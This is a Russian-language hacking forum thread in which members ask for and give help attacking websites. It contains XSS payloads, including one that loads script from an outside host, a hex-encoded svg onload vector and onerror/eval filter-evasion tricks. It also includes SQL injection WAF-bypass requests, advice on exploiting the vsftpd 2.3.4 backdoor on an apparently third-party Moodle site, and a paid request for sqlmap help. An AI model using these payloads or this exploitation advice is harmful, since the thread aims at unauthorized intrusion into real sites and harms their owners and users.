Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    431
    Reputations:
    33
    пробуй alert`aaa`
    вот тебе пример https://forum.antichat.ru/threads/424991/page-17

    но если отработает такая штука, то алерт не нужен
    <script src=//lala.com/lala.js>
     
  2. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    Не выходя из <script>нужно выполнить xss без ;()
     
  3. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    284
    Likes Received:
    80
    Reputations:
    1
    hi
    sqli very hard WAF :( can u help ?

    link: link
     
  4. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    280
    Likes Received:
    135
    Reputations:
    2
    Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.:(
     
  5. crlf

    crlf Members of Antichat

    Joined:
    18 Mar 2016
    Messages:
    512
    Likes Received:
    921
    Reputations:
    317
    Code:
    document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//
    
     
    Octavian likes this.
  6. Bo0oM

    Bo0oM Elder - Старейшина

    Joined:
    26 Dec 2009
    Messages:
    54
    Likes Received:
    23
    Reputations:
    19
    Code:
    onerror=eval;throw'=alert\x281\x29'
    Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

    Code:
    onerror=eval;throw window.name
     
    Octavian likes this.
  7. man474019

    man474019 Member

    Joined:
    31 Jul 2015
    Messages:
    284
    Likes Received:
    80
    Reputations:
    1
    I tried some bypass variants, but no result :( and sqlmap with tamper scripts (modsec, encode) can not..
     
  8. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их
     
  9. Baskin-Robbins

    Baskin-Robbins Well-Known Member

    Joined:
    15 Sep 2018
    Messages:
    149
    Likes Received:
    431
    Reputations:
    33
    миллиона тебе достаточно? много не всегда есть хорошо
    Code:
    https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt
     
    #2749 Baskin-Robbins, 8 Sep 2019
    Last edited: 8 Sep 2019
    seostock and Octavian like this.
  10. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  11. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    84
    Likes Received:
    61
    Reputations:
    4
  12. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)
     
  13. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    84
    Likes Received:
    61
    Reputations:
    4
    Какой модуль msf вы используете? Сам сайт крyтится на moodle, а FTP порт скорее всего открыт хостером.
     
  14. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    VSFTPD v2.3.4
     
  15. fandor9

    fandor9 Member

    Joined:
    16 Nov 2018
    Messages:
    84
    Likes Received:
    61
    Reputations:
    4
    Бэкдор то была всего несколько дней, не факт что она там есть, либо хостеру совсем уж пох..
     
  16. November15

    November15 New Member

    Joined:
    11 Sep 2019
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Если присутствует, то как возможно раскрутить?
     
  17. pacojaveh

    pacojaveh New Member

    Joined:
    14 Sep 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Всем привет,помогите пожалуйста ситуация такая:
    Appspider(Rapid7) находит sql уязвимость "Double-float overflow" отправляя значение "1e309" как данные POST запросом,в ответе Mysql2::Error: Unknown column 'Infinity' in 'field list': INSERT INTO `interactions` (`accept_langs`, `browser`, `browser_version`....перечисление всех колонок) при ЛЮБЫХ других значениях кроме "1e309(и выше 1e310..)" ошибки НЕТ,sqlmap не может раскрутить ее,пробовал фазерам через owasp большим списком также ошибок других не нашлось реакция только на 1e309.
    И из всего этого вопрос как ее раскрутить в sqlmap?готов оплатить за помощь если кто знает как решить,моя телега @S920799
     
  18. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    163
    Likes Received:
    40
    Reputations:
    2
    не нужно постить одно и тоже по десять раз, в разных темах
     
  19. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    В JSON-е возвращается 2+2 на странице выводется 4 также срабатывает sqrt, pow ... как мне получить хотябы Self XSS, если вводить alert(1) пишет на странице { Check formula }, может DOS формулой как то?
     
  20. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    463
    Likes Received:
    80
    Reputations:
    20
    Привет, есть простая CSRF но в запросе JSON, как отправить JSON из формы без = в конце, с флешом не вариант
     
Loading...